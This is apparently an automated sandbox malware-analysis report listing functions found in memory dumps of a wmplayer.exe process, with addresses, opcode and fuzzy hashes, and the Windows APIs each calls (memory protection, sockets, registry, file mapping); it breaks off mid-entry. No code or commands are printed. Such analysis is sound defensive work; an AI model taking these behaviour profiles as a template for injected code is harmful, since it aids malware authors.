Opcode ID: 012aa871f3677a383b4dfc60332e70ad97fcfb6c7e8e6711813f5b43dbe7f4be
Instruction ID: 2be47baaab2164f26a75e3c8d94a6bdac080950b87be40c063822b13f4a71b03
Opcode Fuzzy Hash: 012aa871f3677a383b4dfc60332e70ad97fcfb6c7e8e6711813f5b43dbe7f4be
Instruction Fuzzy Hash: 8E91E430208B158BEB6CDB18F8D927973E9FB55310F144A5DD04BCB187DAB5DA42CB92

Function 00007DF445C422CC Relevance: 2.0, APIs: 1, Instructions: 450timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007DF445C41290: RtlAddFunctionTable.KERNEL32 ref: 00007DF445C412BD

Part of subcall function 00007DF445C412C8: VirtualProtect.KERNELBASE ref: 00007DF445C412F5

SetTimer.USER32 ref: 00007DF445C42762

Memory Dump Source

Source File: 00000010.00000002.2883795495.00007DF445C41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7df445c41000_wmplayer.jbxd

Similarity

API ID: FunctionProtectTableTimerVirtual
String ID:
API String ID: 2248422592-0
Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
Instruction ID: ef201e55fd037ea6d5a9e752c3f237f09dd1b3e17b369b5ed239f59ab67a0585
Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
Instruction Fuzzy Hash: 9EE17231608A484FEB58EF28D88A9AA77F1FF99300F14462ED44BD3295DB78E945C781

Function 000002034328C254 Relevance: 1.8, APIs: 1, Instructions: 560memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 000002034328C654

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 171ce824c8f06d35415f7d12028b36c22ecf671ff2e85487348ef6d74a80d5f7
Instruction ID: 95985a9e7f3eb52f50269225e40137d343365457377212e377c501c5a21c399e
Opcode Fuzzy Hash: 171ce824c8f06d35415f7d12028b36c22ecf671ff2e85487348ef6d74a80d5f7
Instruction Fuzzy Hash: 48F118306186680EE72CDA2CE8D6279B7D5E785301F28476ED4DBC7293DA78C64BC781

Function 00000203432929B0 Relevance: 1.8, APIs: 1, Instructions: 260nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000020343292A70

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: f6cf44e9ab71b64b2d0590e16fb9df9ed4f7049494e36acdaff62ec7f49faed1
Instruction ID: da91d983bc0e0f5268131ecfed810161f3f937bb1345224e43ed7910cfc17098
Opcode Fuzzy Hash: f6cf44e9ab71b64b2d0590e16fb9df9ed4f7049494e36acdaff62ec7f49faed1
Instruction Fuzzy Hash: 38819431718B0D8BF775EB18E4D976AB3D8FF94340F504A19E446CB282EBB4DA418B81

Function 0000020343292794 Relevance: 1.5, APIs: 1, Instructions: 34nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00000203432927E3

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: ec02589470c74ddb517ccee44770714006aaa63c834eebb113c20b250b9cbb3e
Instruction ID: 807f295d7c3052aa19157b5767e91fd92b254ae6bb11fbc7e202e142dfd9eaa4
Opcode Fuzzy Hash: ec02589470c74ddb517ccee44770714006aaa63c834eebb113c20b250b9cbb3e
Instruction Fuzzy Hash: BEF0DA74A18B488FDB64EF2CD8C9B9A77E4FB99300F50451DE84CC7256DB3498408B86

Function 000002034329296C Relevance: 1.5, APIs: 1, Instructions: 29nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000020343292996

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 1eab986862c80bad6c3edccfd7392e5b73ed96bf1c867d7aa62a236f7dfb1cde
Instruction ID: 88757f596acd42d6ec5d5eda4dd45a6e8d266bba7f94679eb63962b3ad29c3fe
Opcode Fuzzy Hash: 1eab986862c80bad6c3edccfd7392e5b73ed96bf1c867d7aa62a236f7dfb1cde
Instruction Fuzzy Hash: 87E09B35208B088FDB00DF94DCC5569B3E4EBD5310F100D69E84ACB165D2A4D648CA82

Function 0000020343292508 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000020343292529

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: ec894fca25604fd2d8f32b4cc270476dc9d2793de8882603ed9d82d901c2ac3a
Instruction ID: 494fb13a3bd23a64541264d4f6516ddf79b1f5bf3a25d5508e1ee1f3f691d2f5
Opcode Fuzzy Hash: ec894fca25604fd2d8f32b4cc270476dc9d2793de8882603ed9d82d901c2ac3a
Instruction Fuzzy Hash: 77D05B74A587498BD714EB28E48060A7BE1FBDA354F944A18E884C7350E239D541CB87

Function 0000020343292894 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 00000203432928B5

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: 65607e2d9cf38a90a53ce21fab6ffb6d74c5e44cf385d317b66c0df0f6d179b3
Instruction ID: 02efc3ae17c6008cfafa76f2b594e043b918c293985aa30520a80f836f557f2d
Opcode Fuzzy Hash: 65607e2d9cf38a90a53ce21fab6ffb6d74c5e44cf385d317b66c0df0f6d179b3
Instruction Fuzzy Hash: AFD05B34E587498FE710EB68E8846197BE1FFCA314F544A5CE84487315D338D5408BC6

Function 0000020343292868 Relevance: 1.5, APIs: 1, Instructions: 18nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000020343292883

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: d59889f617d7bff08c3c306dcc86729138403678600cce333b6fa0b1ef9d72b8
Instruction ID: bb42f6092824a3d61c6243644d0df21977aaebdddb92b8ccd10a3eb6b31f5c2d
Opcode Fuzzy Hash: d59889f617d7bff08c3c306dcc86729138403678600cce333b6fa0b1ef9d72b8
Instruction Fuzzy Hash: 4CD0A734E68F4E4BD654F728EC4430537E1FBD5304F9446449449C3205E23CD5014B86

Function 00000203432923F4 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL ref: 0000020343292404

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: cb6e49784814f37bfdf87bb8ee4b2c73b9f6b012778f5986d955cabc447c04fc
Instruction ID: 976083b3c7ca83e24129a21038b7850e6ee8e48f0b42343bca8bb1ee9f7a42ad
Opcode Fuzzy Hash: cb6e49784814f37bfdf87bb8ee4b2c73b9f6b012778f5986d955cabc447c04fc
Instruction Fuzzy Hash: 65C08C00755A0E8AEA40B26DAEC53043084AB8E304F8808009414C7181E64CC6C54BA3

Function 00000203432928C4 Relevance: 1.5, APIs: 1, Instructions: 13nativeCOMMON

Download Yara Rule

APIs

NtAcceptConnectPort.NTDLL(?,?,?,?,?,?,?,?,?,000002034328531F), ref: 00000203432928D4

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AcceptConnectPort
String ID:
API String ID: 1658770261-0
Opcode ID: ad51530a6b3ae6c9a7bbc712fa827fd3ec896fdee61b8dbcca4fe0e523994bcd
Instruction ID: 97b1330de4bfc8ef2a41103b707055170f4b416322eb3229cf846915e281e748
Opcode Fuzzy Hash: ad51530a6b3ae6c9a7bbc712fa827fd3ec896fdee61b8dbcca4fe0e523994bcd
Instruction Fuzzy Hash: D5C08C04B14E0E1AEA10B3ADAEC83043084FF89304F8004805404C7181E44CC6C987A2

Function 0000020343297D70 Relevance: 7.6, APIs: 5, Instructions: 130
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 0000020343297D79
WSAStartup.WS2_32 ref: 000002034329B1AC
socket.WS2_32 ref: 000002034329B21B
getsockopt.WS2_32 ref: 000002034329B24F
socket.WS2_32 ref: 000002034329B284

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: socket$ErrorModeStartupgetsockopt
String ID:
API String ID: 2955919026-0
Opcode ID: dafe6637fdfc64cad9c391aa12751fdfbb57f817154839fbd3e927dd4477e67d
Instruction ID: b164ac44ad840a71ebd809d47fdbf99cef90b657a926e7529f40b1e6564432c3
Opcode Fuzzy Hash: dafe6637fdfc64cad9c391aa12751fdfbb57f817154839fbd3e927dd4477e67d
Instruction Fuzzy Hash: 13419730618B49CFE759EF28E89C56A77E5FB98300F504A3DE44BC72A1DB788505CB41

Function 00007DF445C31438 Relevance: 6.1, APIs: 4, Instructions: 134registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE ref: 00007DF445C31497
RegQueryValueExW.KERNELBASE ref: 00007DF445C314E6
RegCloseKey.KERNELBASE ref: 00007DF445C3150C
GetVolumeInformationW.KERNELBASE ref: 00007DF445C31570

Memory Dump Source

Source File: 00000010.00000003.2266531166.00007DF445C31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_7df445c31000_wmplayer.jbxd

Similarity

API ID: CloseInformationOpenQueryValueVolume
String ID:
API String ID: 4069062851-0
Opcode ID: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
Instruction ID: d680e2116b731994f7d7d9c0b32dc82fa8eb0c55690227742d7261c512f8b344
Opcode Fuzzy Hash: 3ebb744f0aebbecadcf06631c3d65907a1788fb7df7ced3004579ef494ef68f9
Instruction Fuzzy Hash: 9C412C3151CA488BEB65EB64C899BDBB7F1FB94301F004A2EE48BC6191EF78D504CB42

Function 000002034328DFA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 000002034328E023
VirtualProtect.KERNELBASE ref: 000002034328E04C

Strings

rE\, xrefs: 000002034328DFB8

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: ProtectVirtual
String ID: rE\
API String ID: 544645111-988334199
Opcode ID: 56ded2f76aba9e521797851837a4b2f3d153c924ec938fbea88638a34dbd0d3f
Instruction ID: 4ddaf14af2fe307619b00f7fb33f018e27b31a886d26b39d3594f1d9e31b2690
Opcode Fuzzy Hash: 56ded2f76aba9e521797851837a4b2f3d153c924ec938fbea88638a34dbd0d3f
Instruction Fuzzy Hash: CD119431308A090BEB49FB18E8D5BA972DAF7D8300F501A29950BC7287DE68DA454781

Function 000002034328BBE8 Relevance: 4.6, APIs: 3, Instructions: 110
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenFileMappingW.KERNELBASE ref: 000002034328BC44
MapViewOfFile.KERNELBASE ref: 000002034328BC66
FindCloseChangeNotification.KERNELBASE ref: 000002034328BCDE

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: File$ChangeCloseFindMappingNotificationOpenView
String ID:
API String ID: 1008110341-0
Opcode ID: d1ee0276c6a9abc7f3ca414f662df01792a8f9481f1a0fec4441e0fe510d75cc
Instruction ID: a3ad07c726d08171e7e86c3cbd39a306ecb7e031556703dbda131e3135f834b4
Opcode Fuzzy Hash: d1ee0276c6a9abc7f3ca414f662df01792a8f9481f1a0fec4441e0fe510d75cc
Instruction Fuzzy Hash: B3315431714A098FEB55FF24E8C96AE77D9FB54300F504A2EA44BC7152DE74DA058B81

Function 000002034328B9D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32 ref: 000002034328BB17

Strings

P, xrefs: 000002034328BA3E

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: CreateWindow
String ID: P
API String ID: 716092398-3110715001
Opcode ID: 33407425294ab21e52c6e88b875813605ae86485d5bcfc408320679246036501
Instruction ID: f8de96ddc90e39a588a480590cbb7cf6e75ba3a6c52fc5bf867a4d6692c63b99
Opcode Fuzzy Hash: 33407425294ab21e52c6e88b875813605ae86485d5bcfc408320679246036501
Instruction Fuzzy Hash: 99510D70518B488FE765EF28E88A79AB7E4FB99311F104A2EE48EC3151DF349545CB83

Function 00007DF445C53018 Relevance: 3.3, APIs: 2, Instructions: 297
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007DF445C51708: RtlAddFunctionTable.KERNEL32 ref: 00007DF445C51735

Part of subcall function 00007DF445C51740: VirtualProtect.KERNELBASE ref: 00007DF445C5176D

_calloc_dbg.MSVCRT ref: 00007DF445C5313A
SendMessageA.USER32 ref: 00007DF445C531FB

Memory Dump Source

Source File: 00000010.00000002.2883976721.00007DF445C51000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7df445c51000_wmplayer.jbxd

Similarity

API ID: FunctionMessageProtectSendTableVirtual_calloc_dbg
String ID:
API String ID: 963881631-0
Opcode ID: 06791c2761ba3497e0c9077ab5921302019734c58a86a701aa2be8a22ea6a1e2
Instruction ID: 633dcf9043811995e9a64c4efc206cf3b30c110a905e43c1468489b723b7cf73
Opcode Fuzzy Hash: 06791c2761ba3497e0c9077ab5921302019734c58a86a701aa2be8a22ea6a1e2
Instruction Fuzzy Hash: 1491623160CA584FEF55FF68D8955AA73E2FB94700B904A3ED08BD3192DE78E84587C1

Function 00000203432822D4 Relevance: 3.2, APIs: 2, Instructions: 222
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE ref: 00000203432822EC
VirtualAlloc.KERNELBASE ref: 00000203432823B8

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: AllocInfoSystemVirtual
String ID:
API String ID: 3440192736-0
Opcode ID: 9d7d394a66d420f46729fce2db7dff2fa9ad5080858a19c0972d689d8e5b7fdb
Instruction ID: b0388986e33c1ae0385fd99f1f0daa972ca33a3f5b11550b28a4c93e07ee79a1
Opcode Fuzzy Hash: 9d7d394a66d420f46729fce2db7dff2fa9ad5080858a19c0972d689d8e5b7fdb
Instruction Fuzzy Hash: 53510730218F0D4FFB59EB6CE4DC36972D5F798301F544A2AE84AC7296EEB4C9818781

Function 000002034328D58C Relevance: 3.1, APIs: 2, Instructions: 132
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MapViewOfFile.KERNELBASE ref: 000002034328D5D0
FindCloseChangeNotification.KERNELBASE ref: 000002034328D624

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: ChangeCloseFileFindNotificationView
String ID:
API String ID: 556135526-0
Opcode ID: 80322018c35b880f3fc5fb334795af6ff8e5bbfc1225c14396610ce7e45040e5
Instruction ID: 14eafc6643b8154900975d1625067d6fed9db9da0b2310c2de02881b160496aa
Opcode Fuzzy Hash: 80322018c35b880f3fc5fb334795af6ff8e5bbfc1225c14396610ce7e45040e5
Instruction Fuzzy Hash: DE418131214A1D8FEB59FF28F8D87AA7399FB65310F004A29A40ACB192DF74D9058B81

Function 0000020343282978 Relevance: 3.1, APIs: 2, Instructions: 97
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00000203432829B7
VirtualProtect.KERNELBASE ref: 0000020343282A1D

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 2ae842f36fea739c72eb014a1896d53ef59da352bda2e8d5b1b4a374332cb5f1
Instruction ID: 02c239a34e91b223bb0c68b320ed55556be32ea245f60bc7d247d98226eade26
Opcode Fuzzy Hash: 2ae842f36fea739c72eb014a1896d53ef59da352bda2e8d5b1b4a374332cb5f1
Instruction Fuzzy Hash: E231282120CB844BEB14DB6CE8D87953BD5FB5A314F150395EC9ACB2CADB98C802C346

Function 00007DF445C312C8 Relevance: 3.1, APIs: 2, Instructions: 90memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00007DF445C312F5
VirtualProtect.KERNELBASE ref: 00007DF445C3137E

Memory Dump Source

Source File: 00000010.00000003.2266531166.00007DF445C31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_7df445c31000_wmplayer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
Instruction ID: 56d48f8ab0f502cdfd1542d8f31d29f2250aba358d5cc8d02d55feb3787cd448
Opcode Fuzzy Hash: 89563af4fe1d572c43706a2c5b782feb3df9d02bfd1ff06021ce1d81ad062eb6
Instruction Fuzzy Hash: 7521F732A0C6494BDF68EB2DD484676B3F1FF94300F14513AE84BD7A85DEA8E8018295

Function 00007DF445C51740 Relevance: 3.1, APIs: 2, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007DF445C5176D
VirtualProtect.KERNELBASE ref: 00007DF445C517F6

Memory Dump Source

Source File: 00000010.00000002.2883976721.00007DF445C51000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C51000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7df445c51000_wmplayer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 555ee51bdfbe110a30625e9d65cd405c650e6e50b938efdbc78372c29de57681
Instruction ID: 705b4a98de04f60d799fc2d865efbac93e93455a078a33b62d1e3f41bc00108a
Opcode Fuzzy Hash: 555ee51bdfbe110a30625e9d65cd405c650e6e50b938efdbc78372c29de57681
Instruction Fuzzy Hash: 9921E23660866947EF18EBBC9488677B3F1FF94388F14423AE48BD7285D6A8E841C245

Function 00007DF445C412C8 Relevance: 3.1, APIs: 2, Instructions: 90
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE ref: 00007DF445C412F5
VirtualProtect.KERNELBASE ref: 00007DF445C4137E

Memory Dump Source

Source File: 00000010.00000002.2883795495.00007DF445C41000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C41000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7df445c41000_wmplayer.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
Instruction ID: 6349151f70d00cf903c5f9422ead8e67ab32be0e768fca572d0d1146d6b6e9ec
Opcode Fuzzy Hash: aa55061d99e775b82e27cc6da46f8fa59da2ee6fc95db4891e67f0932caa2168
Instruction Fuzzy Hash: 02212732A0855547EF18EB2DC442E76B3F1FF92300F14113AE88FD7A89D7A8E8018254

Function 000002034328A960 Relevance: 3.0, APIs: 2, Instructions: 42COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,-00000002,0000020343290CC3), ref: 000002034328A976
??3@YAXPEAX@Z.MSVCRT(?,?,?,?,?,?,?,?,-00000002,0000020343290CC3), ref: 000002034328A994

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 85df9ee76aeee916477ee65bd03fae0aa34298d7a375d21a792168504e9e5af9
Instruction ID: d1dcb4781cb74c4145a9ba0a55b5dd22c9ad857342ac773342a9cbf89efce0fe
Opcode Fuzzy Hash: 85df9ee76aeee916477ee65bd03fae0aa34298d7a375d21a792168504e9e5af9
Instruction Fuzzy Hash: 8EF06730214E0EAFEB89EF19E4D8725B3E8FB68315F600A29800AC75A0CBB0D851CB01

Function 000002034328C77C Relevance: 1.8, APIs: 1, Instructions: 272COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 000002034328C9B7

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 7309f67dff61e5dc48b2fd0f18d7f7917c8d8425b72005e60df823d78e13ba3c
Instruction ID: 6082e01cb9057bab6eb04026bb79c9de0b785a1d04af657c2dd5f4d26dbc1c65
Opcode Fuzzy Hash: 7309f67dff61e5dc48b2fd0f18d7f7917c8d8425b72005e60df823d78e13ba3c
Instruction Fuzzy Hash: 68912231618B584BD769EF14D8C96EAB3E5FB94300F404E2ED08AC7193DE709A498B82

Function 00007DF445C315E8 Relevance: 1.7, APIs: 1, Instructions: 228COMMON

Download Yara Rule

APIs

OpenFileMappingW.KERNELBASE ref: 00007DF445C3172D

Memory Dump Source

Source File: 00000010.00000003.2266531166.00007DF445C31000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF445C31000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_3_7df445c31000_wmplayer.jbxd

Similarity

API ID: FileMappingOpen
String ID:
API String ID: 1680863896-0
Opcode ID: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
Instruction ID: b1d97ea090960fd16875862a2fdfe939d922ad53f0f5abefb797a210fdc3fbad
Opcode Fuzzy Hash: a4d7378eb0dc183d45dac9fde789c38604b4b9a60361aa9a1ccba498305d516d
Instruction Fuzzy Hash: 5E71517161C7884FDB75EB2894857ABB7E1FB98300F004A3EE58FC2152EE74A505CB86

Function 000002034328CA84 Relevance: 1.7, APIs: 1, Instructions: 228fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 000002034328CC91

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f08aea806e3529f5290edb05aa8114a1263e5e4f96dee79dea531b54209ca580
Instruction ID: 3dcd095b18eb21ef688d7238b16eed0804d05953442cfacc492bbdff16c8dc19
Opcode Fuzzy Hash: f08aea806e3529f5290edb05aa8114a1263e5e4f96dee79dea531b54209ca580
Instruction Fuzzy Hash: 22719271208F144FE76DEB1CE885A65B3E5FB95710F100B1DE48BC7192DB74EA4A8781

Function 0000020343286C10 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

APIs

SetErrorMode.KERNELBASE ref: 0000020343286CD6

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 8001d989f1cdce814a29af2e0a7e370aa2634a56a7ebfb0ceb641defc4775816
Instruction ID: ea920a22d35ce443cd1638b34ef52debb70103250a78f9926498b06322052e0b
Opcode Fuzzy Hash: 8001d989f1cdce814a29af2e0a7e370aa2634a56a7ebfb0ceb641defc4775816
Instruction Fuzzy Hash: 11417334314B084BFB5DE728E8D97AE32D9EB94314F400F29A90ACB1D3DEB5DB058642

Function 000002034328A76C Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

_malloc_dbg.MSVCRT ref: 000002034328A7FB

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: _malloc_dbg
String ID:
API String ID: 1527718024-0
Opcode ID: e568505596feb0863fa8fd61fae6cc21c3a1ddab3611d6ef0cbfe08b0bd23ad4
Instruction ID: ac6da8c978c6a4691d220f42d86c1e811dbffbd2c49ae29ba2f931c338628040
Opcode Fuzzy Hash: e568505596feb0863fa8fd61fae6cc21c3a1ddab3611d6ef0cbfe08b0bd23ad4
Instruction Fuzzy Hash: D0418131214E0E9FDB98EF2CE88CA65B7E5FB683117144B6AD409C7661DB70E991CBC0

Function 000002034328778C Relevance: 1.6, APIs: 1, Instructions: 137COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE ref: 00000203432878B2

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_20343281000_wmplayer.jbxd

Similarity

API ID: InformationVolume
String ID:
API String ID: 2039140958-0
Opcode ID: b283c3548b5789a4684f1aad4b152fb3e7ad83753620ae905ad9390ad1c269ef
Instruction ID: 90d980f80c541395a690229762b250371f007b257ac70cce022fc3a74082559b
Opcode Fuzzy Hash: b283c3548b5789a4684f1aad4b152fb3e7ad83753620ae905ad9390ad1c269ef
Instruction Fuzzy Hash: DE412E712187488BE769EB24D8997DBB7E4FF94300F104A1DA48AC7192DFB59605CB82

Function 000002034328CCC8 Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 000002034328CD27

Memory Dump Source

Source File: 00000010.00000002.2881689782.0000020343281000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000020343281000, based on PE: false

Joe Sandbox IDA Plugin

